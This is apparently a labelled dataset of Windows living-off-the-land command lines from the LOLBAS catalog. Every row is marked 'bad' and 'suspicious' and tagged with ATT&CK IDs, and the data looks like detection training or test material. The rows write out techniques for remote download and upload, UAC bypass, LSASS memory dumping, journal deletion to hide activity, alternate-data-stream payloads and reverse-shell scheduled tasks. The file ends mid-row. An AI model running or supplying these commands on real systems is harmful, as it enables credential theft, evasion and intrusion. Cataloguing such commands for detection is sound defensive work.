HKEY_CURRENT_USER\MyCustomRegKey,regedit /E {PATH_ABSOLUTE}:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Regedit.yml,Regedit.exe,ADS,"[""T1564.004""]","Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,Export the target Registry key to the specified .REG file.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 71d5db4478122d0095cd4072,regedit {PATH_ABSOLUTE}:regfile.reg,regedit {PATH_ABSOLUTE}:regfile.reg,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Regedit.yml,Regedit.exe,ADS,"[""T1564.004""]","Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,Import the target .REG file into the Registry.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 361c14457714fe3bb78d4731,wlrmdr.exe -s 3600 -f 0 -t _ -m _ -a 11 -u {PATH:.exe},wlrmdr.exe -s 3600 -f 0 -t _ -m _ -a 11 -u {PATH:.exe},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Wlrmdr.yml,Wlrmdr.exe,Execute,"[""T1202"", {""Execute"": ""EXE""}]","Windows 10, Windows 11",0.85,False,Execute executable with wlrmdr.exe as parent process,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 0eb47523451aec10668a05ac,CertReq -Post -config {REMOTEURL} {PATH_ABSOLUTE} {PATH:.txt},CertReq -Post -config {REMOTEURL} {PATH_ABSOLUTE} {PATH:.txt},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Certreq.yml,CertReq.exe,Download,"[""T1105""]","Windows 10, Windows 11",0.85,False,Send the specified file (penultimate argument) to the specified URL via HTTP POST and save the response to the specified txt file (last argument).,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 3897e3c3f5cbe3ceb579fd09,CertReq -Post -config {REMOTEURL} {PATH_ABSOLUTE},CertReq -Post -config {REMOTEURL} {PATH_ABSOLUTE},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Certreq.yml,CertReq.exe,Upload,"[""T1105""]","Windows 10, Windows 11",0.85,False,Send the specified file (last argument) to the specified URL via HTTP POST and show response in terminal.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 09a95f722711ed9bbf1ef1c5,cscript //e:vbscript {PATH_ABSOLUTE}:script.vbs,cscript //e:vbscript {PATH_ABSOLUTE}:script.vbs,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Cscript.yml,Cscript.exe,ADS,"[""T1564.004"", {""Execute"": ""WSH""}]","Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,Use cscript.exe to exectute a Visual Basic script stored in an Alternate Data Stream (ADS).,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review c74523c1a9bfc5b16dc4f6ad,CustomShellHost.exe,CustomShellHost.exe,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/CustomShellHost.yml,CustomShellHost.exe,Execute,"[""T1218"", {""Execute"": ""EXE""}]","Windows 10, Windows 11",0.85,False,Executes explorer.exe (with command-line argument /NoShellRegistrationCheck) if present in the current working folder.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 912264579deb2a1b501c59b3,ngen.exe {REMOTEURL},ngen.exe {REMOTEURL},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Ngen.yml,Ngen.exe,Download,"[""T1105"", {""Download"": ""INetCache""}]","Windows 10, Windows 11",0.85,False,Downloads payload from remote server using the Microsoft Native Image Generator utility.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 934e4a75706de420468d4132,eventvwr.exe,eventvwr.exe,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Eventvwr.yml,Eventvwr.exe,UAC Bypass,"[""T1548.002"", {""Application"": ""GUI""}, {""Execute"": ""EXE""}]","Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10",0.85,False,"During startup, eventvwr.exe checks the registry value `HKCU\Software\Classes\mscfile\shell\open\command` for the location of mmc.exe, which is used to open the eventvwr.msc saved console file. If the location of another binary or script is added to this registry value, it will be executed as a high-integrity process without a UAC prompt being displayed to the user.",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 8f9e05cd0d84bc82a57160f1,"ysoserial.exe -o raw -f BinaryFormatter - g DataSet -c ""{CMD}"" > RecentViews & copy RecentViews %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews & eventvwr.exe","ysoserial.exe -o raw -f BinaryFormatter - g DataSet -c ""{CMD}"" > RecentViews & copy RecentViews %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews & eventvwr.exe",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Eventvwr.yml,Eventvwr.exe,UAC Bypass,"[""T1548.002"", {""Application"": ""GUI""}, {""Execute"": "".NetObjects""}]","Windows 7, Windows 8, Windows 8.1, Windows 10",0.85,False,"During startup, eventvwr.exe uses .NET deserialization with `%LOCALAPPDATA%\Microsoft\EventV~1\RecentViews` file. This file can be created using https://github.com/pwntester/ysoserial.net",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review da370d5280c1ba71cc392592,Extexport.exe {PATH_ABSOLUTE:folder} foo bar,Extexport.exe {PATH_ABSOLUTE:folder} foo bar,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Extexport.yml,Extexport.exe,Execute,"[""T1218"", {""Execute"": ""DLL""}]","Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,"Load a DLL located in the specified folder with one of the following names mozcrt19.dll, mozsqlite3.dll, or sqlite.dll.",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 4bbb52eb99aea95e429affab,change.exe user,change.exe user,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Change.yml,Change.exe,Execute,"[""T1218"", {""Execute"": ""EXE""}, {""Requires"": ""Rename""}]","Windows 10, Windows 11",0.85,False,"Once executed, `change.exe` will execute `chgusr.exe` in the same folder. Thus, if `change.exe` is copied to a folder and an arbitrary executable is renamed to `chgusr.exe`, `change.exe` will spawn it. Instead of `user`, it is also possible to use `port` or `logon` as command-line option.",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 4bfccf0fc61c2ed7d4240169,ilasm.exe {PATH_ABSOLUTE:.txt} /exe,ilasm.exe {PATH_ABSOLUTE:.txt} /exe,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Ilasm.yml,Ilasm.exe,Compile,"[""T1127""]","Windows 7, Windows 10, Windows 11",0.85,False,Binary file used by .NET to compile C#/intermediate (IL) code to .exe,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 5af66da2da2750255d1a8e4f,ilasm.exe {PATH_ABSOLUTE:.txt} /dll,ilasm.exe {PATH_ABSOLUTE:.txt} /dll,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Ilasm.yml,Ilasm.exe,Compile,"[""T1127""]","Windows 7, Windows 10, Windows 11",0.85,False,Binary file used by .NET to compile C#/intermediate (IL) code to dll,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review cd18162e6a7572059ad5e1ba,vbc.exe /target:exe {PATH_ABSOLUTE:.vb},vbc.exe /target:exe {PATH_ABSOLUTE:.vb},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Vbc.yml,vbc.exe,Compile,"[""T1127""]","Windows 7, Windows 10, Windows 11",0.85,False,Binary file used by .NET to compile Visual Basic code to an executable.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 17aae0ad6aca26411ecde243,vbc -reference:Microsoft.VisualBasic.dll {PATH_ABSOLUTE:.vb},vbc -reference:Microsoft.VisualBasic.dll {PATH_ABSOLUTE:.vb},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Vbc.yml,vbc.exe,Compile,"[""T1127""]","Windows 7, Windows 10, Windows 11",0.85,False,Binary file used by .NET to compile Visual Basic code to an executable.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 5326c296516693810b34898a,DataSvcUtil /out:{PATH_ABSOLUTE} /uri:{REMOTEURL},DataSvcUtil /out:{PATH_ABSOLUTE} /uri:{REMOTEURL},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/DataSvcUtil.yml,DataSvcUtil.exe,Upload,"[""T1567""]",Windows 10,0.85,False,"Upload file, credentials or data exfiltration in general",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 5d91ffd8220068e0530f2835,cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:{REMOTEURL:.sct} ^scrobj.dll > {PATH}:payload.bat,cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:{REMOTEURL:.sct} ^scrobj.dll > {PATH}:payload.bat,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Cmd.yml,Cmd.exe,ADS,"[""T1564.004""]","Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,Add content to an Alternate Data Stream (ADS).,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 2393369cde2b2d0b9ba68b39,cmd.exe - < {PATH}:payload.bat,cmd.exe - < {PATH}:payload.bat,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Cmd.yml,Cmd.exe,ADS,"[""T1059.003""]","Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,Execute payload.bat stored in an Alternate Data Stream (ADS).,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 5321b44b029bc74ed6d9fdb5,type {PATH_SMB} > {PATH_ABSOLUTE},type {PATH_SMB} > {PATH_ABSOLUTE},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Cmd.yml,Cmd.exe,Download,"[""T1105""]","Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,Downloads a specified file from a WebDAV server to the target file.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 8b6de716c94f8bb8967fa8d2,type {PATH_ABSOLUTE} > {PATH_SMB},type {PATH_ABSOLUTE} > {PATH_SMB},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Cmd.yml,Cmd.exe,Upload,"[""T1048.003""]","Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,Uploads a specified file to a WebDAV server.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 6a3d6bd6e93edc4883ac7a05,runscripthelper.exe surfacecheck \\?\{PATH_ABSOLUTE:.txt} {PATH_ABSOLUTE:folder},runscripthelper.exe surfacecheck \\?\{PATH_ABSOLUTE:.txt} {PATH_ABSOLUTE:folder},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Runscripthelper.yml,Runscripthelper.exe,Execute,"[""T1218"", {""Execute"": ""PowerShell""}]","Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10",0.85,False,Execute the PowerShell script with .txt extension,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 3de0aa497fa9214e6f6aeea6,SettingSyncHost -LoadAndRunDiagScript {PATH:.exe},SettingSyncHost -LoadAndRunDiagScript {PATH:.exe},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/SettingSyncHost.yml,SettingSyncHost.exe,Execute,"[""T1218"", {""Execute"": ""EXE""}]","Windows 8, Windows 8.1, Windows 10",0.85,False,Execute file specified in %COMSPEC%,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 582fbbcaab06b4b5b30afd53,SettingSyncHost -LoadAndRunDiagScriptNoCab {PATH:.bat},SettingSyncHost -LoadAndRunDiagScriptNoCab {PATH:.bat},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/SettingSyncHost.yml,SettingSyncHost.exe,Execute,"[""T1218"", {""Execute"": ""CMD""}]","Windows 8, Windows 8.1, Windows 10",0.85,False,Execute a batch script in the background (no window ever pops up) which can be subverted to running arbitrary programs by setting the current working directory to %TMP% and creating files such as reg.bat/reg.exe in that directory thereby causing them to execute instead of the ones in C:\Windows\System32.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review e0e0931fcb65d1c32a0ed703,InfDefaultInstall.exe {PATH:.inf},InfDefaultInstall.exe {PATH:.inf},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Infdefaultinstall.yml,Infdefaultinstall.exe,Execute,"[""T1218"", {""Execute"": ""INF""}]","Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 9d15fadfadab30e17ef41028,diskshadow.exe /s {PATH:.txt},diskshadow.exe /s {PATH:.txt},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Diskshadow.yml,Diskshadow.exe,Dump,"[""T1003.003"", {""Execute"": ""CMD""}]",Windows server,0.85,False,Execute commands using diskshadow.exe from a prepared diskshadow script.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 6e2e215ab01488bb069923f1,diskshadow> exec {PATH:.exe},diskshadow> exec {PATH:.exe},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Diskshadow.yml,Diskshadow.exe,Execute,"[""T1202"", {""Execute"": ""CMD""}]",Windows server,0.85,False,Execute commands using diskshadow.exe to spawn child process,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 3ef95a4a33fa1abb91cf3f14,fsutil.exe file setZeroData offset=0 length=9999999999 {PATH_ABSOLUTE},fsutil.exe file setZeroData offset=0 length=9999999999 {PATH_ABSOLUTE},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Fsutil.yml,Fsutil.exe,Tamper,"[""T1485""]","Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10",0.85,False,Zero out a file,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 8a1859b4ad18e99cab466dda,fsutil.exe usn deletejournal /d c:,fsutil.exe usn deletejournal /d c:,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Fsutil.yml,Fsutil.exe,Tamper,"[""T1485""]","Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10",0.85,False,Delete the USN journal volume to hide file creation activity,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review f2b22541c50281463835236c,fsutil.exe trace decode,fsutil.exe trace decode,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Fsutil.yml,Fsutil.exe,Execute,"[""T1218"", {""Execute"": ""EXE""}]",Windows 11,0.85,False,Executes a pre-planted binary named netsh.exe from the current directory.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 57f727dab95879b2eace3b76,"set ""SYSTEMROOT=C:\Windows\Temp"" && cmd /c desktopimgdownldr.exe /lockscreenurl:{REMOTEURL} /eventName:desktopimgdownldr","set ""SYSTEMROOT=C:\Windows\Temp"" && cmd /c desktopimgdownldr.exe /lockscreenurl:{REMOTEURL} /eventName:desktopimgdownldr",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Desktopimgdownldr.yml,Desktopimgdownldr.exe,Download,"[""T1105""]","Windows 10, Windows 11",0.85,False,Downloads the file and sets it as the computer's lockscreen,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review e2ef8863ff238a0dbb8c0efa,"schtasks /create /sc minute /mo 1 /tn ""Reverse shell"" /tr ""{CMD}""","schtasks /create /sc minute /mo 1 /tn ""Reverse shell"" /tr ""{CMD}""",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Schtasks.yml,Schtasks.exe,Execute,"[""T1053.005"", {""Execute"": ""CMD""}]","Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,Create a recurring task to execute every minute.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 4b8bd2561a6a3fc601589406,"schtasks /create /s targetmachine /tn ""MyTask"" /tr ""{CMD}"" /sc daily","schtasks /create /s targetmachine /tn ""MyTask"" /tr ""{CMD}"" /sc daily",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Schtasks.yml,Schtasks.exe,Execute,"[""T1053.005"", {""Execute"": ""CMD""}]","Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,Create a scheduled task on a remote computer for persistence/lateral movement,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 7c5524aa21d3a7f6e18ac968,"TTDInject.exe /ClientParams ""7 tmp.run 0 0 0 0 0 0 0 0 0 0"" /Launch ""{PATH:.exe}""","TTDInject.exe /ClientParams ""7 tmp.run 0 0 0 0 0 0 0 0 0 0"" /Launch ""{PATH:.exe}""",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Ttdinject.yml,Ttdinject.exe,Execute,"[""T1127"", {""Execute"": ""EXE""}]","Windows 10 2004 and above, Windows 11",0.85,False,"Execute a program using ttdinject.exe. Requires administrator privileges. A log file will be created in tmp.run. The log file can be changed, but the length (7) has to be updated.",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 988002afee7edf38d33ffe64,"ttdinject.exe /ClientScenario TTDRecorder /ddload 0 /ClientParams ""7 tmp.run 0 0 0 0 0 0 0 0 0 0"" /launch ""{PATH:.exe}""","ttdinject.exe /ClientScenario TTDRecorder /ddload 0 /ClientParams ""7 tmp.run 0 0 0 0 0 0 0 0 0 0"" /launch ""{PATH:.exe}""",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Ttdinject.yml,Ttdinject.exe,Execute,"[""T1127"", {""Execute"": ""EXE""}]",Windows 10 1909 and below,0.85,False,"Execute a program using ttdinject.exe. Requires administrator privileges. A log file will be created in tmp.run. The log file can be changed, but the length (7) has to be updated.",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 3ef54ac11dc1dc40c3411967,stordiag.exe,stordiag.exe,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Stordiag.yml,Stordiag.exe,Execute,"[""T1218"", {""Execute"": ""EXE""}]",Windows 10,0.85,False,"Once executed, Stordiag.exe will execute schtasks.exe systeminfo.exe and fltmc.exe - if stordiag.exe is copied to a folder and an arbitrary executable is renamed to one of these names, stordiag.exe will execute it.",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review a24671fda4bf0ad8636a8fc5,rdrleakdiag.exe /p 940 /o {PATH_ABSOLUTE:folder} /fullmemdmp /wait 1,rdrleakdiag.exe /p 940 /o {PATH_ABSOLUTE:folder} /fullmemdmp /wait 1,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Rdrleakdiag.yml,rdrleakdiag.exe,Dump,"[""T1003""]",Windows,0.85,False,Dump process by PID and create a dump file (creates files called `minidump_.dmp` and `results_.hlk`).,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 452126bd0d05e82b02d3f994,rdrleakdiag.exe /p 832 /o {PATH_ABSOLUTE:folder} /fullmemdmp /wait 1,rdrleakdiag.exe /p 832 /o {PATH_ABSOLUTE:folder} /fullmemdmp /wait 1,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Rdrleakdiag.yml,rdrleakdiag.exe,Dump,"[""T1003.001""]",Windows,0.85,False,Dump LSASS process by PID and create a dump file (creates files called `minidump_.dmp` and `results_.hlk`).,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 3765ec5c53bd0ef6df135e70,rdrleakdiag.exe /p 832 /o {PATH_ABSOLUTE:folder} /fullmemdmp /snap,rdrleakdiag.exe /p 832 /o {PATH_ABSOLUTE:folder} /fullmemdmp /snap,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Rdrleakdiag.yml,rdrleakdiag.exe,Dump,"[""T1003.001""]",Windows,0.85,False,"After dumping a process using `/wait 1`, subsequent dumps must use `/snap` (creates files called `minidump_.dmp` and `results_.hlk`).",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 0af96ee39326e845f8e134d1,replace.exe {PATH_ABSOLUTE:.cab} {PATH_ABSOLUTE:folder} /A,replace.exe {PATH_ABSOLUTE:.cab} {PATH_ABSOLUTE:folder} /A,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Replace.yml,Replace.exe,Copy,"[""T1105""]","Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,Copy .cab file to destination,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review fc086e564e6fd90b012d9937,replace.exe {PATH_SMB:.exe} {PATH_ABSOLUTE:folder} /A,replace.exe {PATH_SMB:.exe} {PATH_ABSOLUTE:folder} /A,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Replace.yml,Replace.exe,Download,"[""T1105""]","Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,Download/Copy executable to specified folder,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review bfeb69da579ae3fe346e683e,"rmdir %temp%\lolbin /s /q 2>nul & mkdir ""%temp%\lolbin\Windows Media Player"" & copy C:\Windows\System32\calc.exe ""%temp%\lolbin\Windows Media Player\wmpnscfg.exe"" >nul && cmd /V /C ""set ""ProgramW6432=%temp%\lolbin"" && unregmp2.exe /HideWMP""","rmdir %temp%\lolbin /s /q 2>nul & mkdir ""%temp%\lolbin\Windows Media Player"" & copy C:\Windows\System32\calc.exe ""%temp%\lolbin\Windows Media Player\wmpnscfg.exe"" >nul && cmd /V /C ""set ""ProgramW6432=%temp%\lolbin"" && unregmp2.exe /HideWMP""",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Unregmp2.yml,Unregmp2.exe,Execute,"[""T1202"", {""Execute"": ""EXE""}]",Windows 10,0.85,False,"Allows an attacker to copy a target binary to a controlled directory and modify the 'ProgramW6432' environment variable to point to that controlled directory, then execute 'unregmp2.exe' with argument '/HideWMP' which will spawn a process at the hijacked path '%ProgramW6432%\wmpnscfg.exe'.",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 6e62352fccd7efac5818d6a6,wbemtest.exe,wbemtest.exe,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Wbemtest.yml,wbemtest.exe,Execute,"[""T1047"", {""Application"": ""GUI""}, {""Execute"": ""CMD""}]","Windows 10, Windows 11",0.85,False,"Execute arbitary commands through WMI through a GUI managment interface for Web Based Enterprise Management testing (WBEM). Uses WMI to Create and instance of a Win32_Process WMI class with a commandline argument of the target command to spawn. Spawns a GUI so it requires interactive access. For a demo, see link to blog in resources.",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 4db06afb759305d2d85797ff,wuauclt.exe /UpdateDeploymentProvider {PATH_ABSOLUTE:.dll} /RunHandlerComServer,wuauclt.exe /UpdateDeploymentProvider {PATH_ABSOLUTE:.dll} /RunHandlerComServer,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Wuauclt.yml,wuauclt.exe,Execute,"[""T1218"", {""Execute"": ""DLL""}]",Windows 10,0.85,False,Loads and executes DLL code on attach.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 313190cdf5d12fc3f3c7825b,netsh.exe add helper {PATH_ABSOLUTE:.dll},netsh.exe add helper {PATH_ABSOLUTE:.dll},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Netsh.yml,Netsh.exe,Execute,"[""T1546.007"", {""Execute"": ""DLL""}]","Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,"Use Netsh in order to execute a .dll file and also gain persistence, every time the netsh command is called",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 5932d50e5fa69f89fdc7c590,C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe {REMOTEURL:.zip},C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe {REMOTEURL:.zip},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/msedge_proxy.yml,msedge_proxy.exe,Download,"[""T1105""]","Windows 10, Windows 11",0.85,False,msedge_proxy will download malicious file.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 50e34637fef244dc47039d92,"C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe --disable-gpu-sandbox --gpu-launcher=""{CMD} &&""","C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe --disable-gpu-sandbox --gpu-launcher=""{CMD} &&""",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/msedge_proxy.yml,msedge_proxy.exe,Execute,"[""T1218.015"", {""Execute"": ""CMD""}]","Windows 10, Windows 11",0.85,False,msedge_proxy.exe will execute file in the background,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 5f54570692519bf495161c9f,finger user@example.host.com | more +2 | cmd,finger user@example.host.com | more +2 | cmd,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Finger.yml,Finger.exe,Download,"[""T1105""]","Windows 8.1, Windows 10, Windows 11, Windows Server 2008, Windows Server 2008R2, Windows Server 2012, Windows Server 2012R2, Windows Server 2016, Windows Server 2019, Windows Server 2022",0.85,False,"Downloads payload from remote Finger server. This example connects to ""example.host.com"" asking for user ""user""; the result could contain malicious shellcode which is executed by the cmd process.",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 619f5b74a068fbea3da17cba,C:\Windows\System32\IME\SHARED\IMEWDBLD.exe {REMOTEURL},C:\Windows\System32\IME\SHARED\IMEWDBLD.exe {REMOTEURL},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/IMEWDBLD.yml,IMEWDBLD.exe,Download,"[""T1105"", {""Download"": ""INetCache""}]","Windows 10, Windows 11",0.85,False,"IMEWDBLD.exe attempts to load a dictionary file, if provided a URL as an argument, it will download the file served at by that URL and save it to INetCache.",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 242725a36453a098cdb9c1d9,reset.exe session,reset.exe session,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Reset.yml,Reset.exe,Execute,"[""T1218"", {""Execute"": ""EXE""}, {""Requires"": ""Rename""}]","Windows 10, Windows 11",0.85,False,"Once executed, `reset.exe` will execute `rwinsta.exe` in the same folder. Thus, if `reset.exe` is copied to a folder and an arbitrary executable is renamed to `rwinsta.exe`, `reset.exe` will spawn it.",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 386d7417490c5cb532013526,pnputil.exe -i -a {PATH_ABSOLUTE:.inf},pnputil.exe -i -a {PATH_ABSOLUTE:.inf},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Pnputil.yml,Pnputil.exe,Execute,"[""T1547"", {""Execute"": ""INF""}]","Windows 7, Windows 10, Windows 11",0.85,False,Used for installing drivers,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 0c957c5629f05430c1021a5a,regini.exe {PATH}:hidden.ini,regini.exe {PATH}:hidden.ini,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSBinaries/Regini.yml,Regini.exe,ADS,"[""T1564.004""]","Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,Write registry keys from data inside the Alternate data stream.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 238697998ad30f84f0c5875a,winget.exe install --manifest {PATH:.yml},winget.exe install --manifest 